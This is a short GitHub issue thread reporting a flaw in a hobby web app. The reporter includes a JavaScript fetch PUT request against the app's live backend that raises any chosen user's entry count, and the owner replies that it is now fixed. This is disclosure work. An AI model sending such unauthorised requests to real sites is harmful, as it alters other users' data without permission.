### ISSUE TITLE
Open to CRSF attack

### ISSUE THREAD

**Issue by Murat-Karakaya** [Esat-Karakaya/ztm-frontend#1]
When you go to [the website](https://ztm-frontend.onrender.com/) and run,
<details><summary>this code</summary>
<p>

 
```js
fetch("https://ztm-backend.onrender.com/entries", {
    method: "PUT",
    headers: {
        "Content-Type": "application/json"
    },
    body: JSON.stringify({
        imgurl: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRJAMWUz0794EJl9_qzWpsS4Yklr4na40xnPg&usqp=CAU",
        id: 2  // I put 2 as id, but you can pick your target from https://ztm-backend.onrender.com/
    })
}).then(I=>I.json())
```
</p>
</details>  the console simply gives you an error. but you actually have just added 1 someones entry count.

Why am I openly showing everyone this issue? Because changing someones entry count isn't a big deal. But it should be fixed

**Comment by Esat-Karakaya** [comment]
Yep, ur rigth but i didn't though of fixing it because the repositary was actually old and the issue didn't had a big impact . But since you reminded me this issue i reconsidered and decided to release a fix because it's out in the web. So the issue is solved and thanks for warning bud 👍

**Comment by Murat-Karakaya** [comment]
Keep the good work : D
